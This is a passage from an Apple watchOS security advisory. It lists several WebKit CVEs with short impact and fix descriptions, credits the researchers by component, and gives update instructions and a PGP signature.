WebKit Bugzilla: 249451  
CVE-2023-39434: Francisco Alonso (@revskills), and Dohyun Lee  
(@l33d0hyun) of PK Security

WebKit  
Available for: Apple Watch Series 4 and later  
Impact: Processing web content may lead to arbitrary code execution  
Description: The issue was addressed with improved checks.  
WebKit Bugzilla: 256551  
CVE-2023-41074: 이준성(Junsung Lee) of Cross Republic and me Li

WebKit  
Available for: Apple Watch Series 4 and later  
Impact: Processing web content may lead to arbitrary code execution  
Description: The issue was addressed with improved memory handling.  
WebKit Bugzilla: 239758  
CVE-2023-35074: Abysslab Dong Jun Kim(@smlijun) and Jong Seong  
Kim(@nevul37)

Additional recognition

Airport  
We would like to acknowledge Adam M., and Noah Roskin-Frazee and  
Professor Jason Lau (ZeroClicks.ai Lab) for their assistance.

Audio  
We would like to acknowledge Mickey Jin (@patch1t) for their assistance.

Bluetooth  
We would like to acknowledge Jianjun Dai and Guang Gong of 360  
Vulnerability Research Institute for their assistance.

Books  
We would like to acknowledge Aapo Oksman of Nixu Cybersecurity for their  
assistance.

Control Center  
We would like to acknowledge Chester van den Bogaard for their  
assistance.

Data Detectors UI  
We would like to acknowledge Abhay Kailasia (@abhay_kailasia) of Lakshmi  
Narain College Of Technology Bhopal for their assistance.

Find My  
We would like to acknowledge Cher Scarlett for their assistance.

Home  
We would like to acknowledge Jake Derouin (jakederouin.com) for their  
assistance.

Kernel  
We would like to acknowledge Bill Marczak of The Citizen Lab at The  
University of Toronto's Munk School, Maddie Stone of Google's Threat  
Analysis Group, and 永超 王 for their assistance.

libxml2  
We would like to acknowledge OSS-Fuzz, and Ned Williamson of Google  
Project Zero for their assistance.

libxpc  
We would like to acknowledge an anonymous researcher for their  
assistance.

libxslt  
We would like to acknowledge Dohyun Lee (@l33d0hyun) of PK Security,  
OSS-Fuzz, and Ned Williamson of Google Project Zero for their  
assistance.

NSURL  
We would like to acknowledge Zhanpeng Zhao (行之) and 糖豆爸爸(@晴天组织) for  
their assistance.

Photos  
We would like to acknowledge Dawid Pałuska and Kirin (@Pwnrin) for their  
assistance.

Photos Storage  
We would like to acknowledge Wojciech Regula of SecuRing  
(wojciechregula.blog) for their assistance.

Power Services  
We would like to acknowledge Mickey Jin (@patch1t) for their assistance.

Shortcuts  
We would like to acknowledge Alfie Cockell Gwinnett, Christian Basting  
of Bundesamt für Sicherheit in der Informationstechnik, Cristian Dinca  
of "Tudor Vianu" National High School of Computer Science, Romania,  
Giorgos Christodoulidis, Jubaer Alnazi of TRS Group Of Companies,  
KRISHAN KANT DWIVEDI, and Matthew Butler for their assistance.

Software Update  
We would like to acknowledge Omar Siman for their assistance.

StorageKit  
We would like to acknowledge Mickey Jin (@patch1t) for their assistance.

WebKit  
We would like to acknowledge Khiem Tran, Narendra Bhati From Suma Soft  
Pvt. Ltd, and an anonymous researcher for their assistance.

Instructions on how to update your Apple Watch software are available  
at https://support.apple.com/kb/HT204641  To check the version on  
your Apple Watch, open the Apple Watch app on your iPhone and select  
"My Watch > General > About".  Alternatively, on your watch, select  
"My Watch > General > About".  
All information is also posted on the Apple Security Updates  
web site: https://support.apple.com/en-us/HT201222.

This message is signed with Apple's Product Security PGP key,  
and details are available at:  
https://www.apple.com/support/security/pgp/  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEsz9altA7uTI+rE/qX+5d1TXaIvoFAmUTSJkACgkQX+5d1TXa  
Ivo3WhAA1an2sh+qEnBj7zKhCx64vpUB3B6ET0lh+vMjHwu3Z7ThtdEnjwUgs1SA  
5zzj3Jsf8Zb/ivyQ+jfI5IyUZxCT+sWn3t3CHN4jb1LTsxL/h9mrP42U01GTooju  
erIvHarH2gk/Qew99cPPok7MpyNVPmRfJ3juEIZOe4CjsKLsWz6HRsiIQE/nvMta  
NUIiF6/VTzdynDEFlK7iUWS31N2nN3pLhUFwOdKz1t1lCKpWBYsSPPms6nmFLeWJ  
3rfyDPzupAQxfhldfgdBpQvYzYiDpqRNUBrFJCKG8BaKpv87AZI7NKgNv4WYNWP9  
0P3IIIAvGVpCmNcjGl18K9hiigXfs+U0QPA6DD2O2hnsUmiUbLnEc4BpkK5KO+y1  
uteIDhV8IsN4n86h9IGY2nImJtbUSADhsIRkwdbI8Z80q4zLYteKuj83FztVgSx2  
/C382yyFqMZA8DnSy+CNbCp5AsHOPAgeC+sTvnLlPfPAyJMMSyoQk8S1ARx6fqog  
TEu8GPqOWjyol8gKTTnEqufLF+lmJbNxxAKLXt7rhpiy8Bl4GUYIooKta32MshVU  
fsoujI+xVfsGwev0QZIPa+ElCMj8r2GhHqBZ+ceifRhMPBJ/UcnP6Y+ekg26pVnI  
CbJ+Aj4WU3KKRdpKWP6TT8eIOq6tvYYMJKCylCVKFeEGkpB7sEE=  
=TnBb  
-----END PGP SIGNATURE-----

Tag

#git